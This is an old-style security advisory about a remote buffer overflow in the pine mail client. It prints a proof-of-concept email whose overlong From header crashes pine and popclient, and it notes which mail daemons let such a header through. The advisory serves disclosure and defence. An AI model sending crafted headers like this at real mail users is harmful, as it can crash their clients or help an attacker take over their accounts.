COMMAND

    pine

SYSTEMS AFFECTED

    Most unices running pine

PROBLEM

    Michal Zalewski  found silly  remote overflow  in pine.   It's  so
    simple there's no need to describe it:

        From: Michal Zalewski
        <lcamtuf@AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>

    ...and any attempt of reading this mail will cause:

        Program received signal SIGSEGV, Segmentation fault.
        0x41414141 in ?? ()

    Also, attempting to so much as download *THIS* email will cause  a
    panic in 'popclient.' pine  is fine, but popclient  can't retrieve
    email past this message.

        > RETR 9
        +OK 3897 octets.
        (56 lines of message content)
        > DELE 1094795585
        doPOP3: cleanUp: Bad file descriptor

    It  can  be  exploited  to  gain  access to remote/local accounts.
    Fortunately, too  long headers  are destroyed  by sendmail  during
    prescan (maybe there's any way  to split long line using  encoding
    tricks):

        Jun 17 16:49:24 genome sendmail[689]: QAA00689: SYSERR(root): prescan:
        token too long

    But other mail daemons  aren't so strict -  it works.  One  report
    says fetchmail  (release 3.8  pl 0)  is OK  while other states the
    same  problem  exists  using  fetchpop  with  procmail.  Pine 3.96
    seems to be OK.   BTW, when you try  to take the address  from the
    e-mail it crashes too.  So don't press "t".

SOLUTION

   The only way to get rid of the offending message is by hand.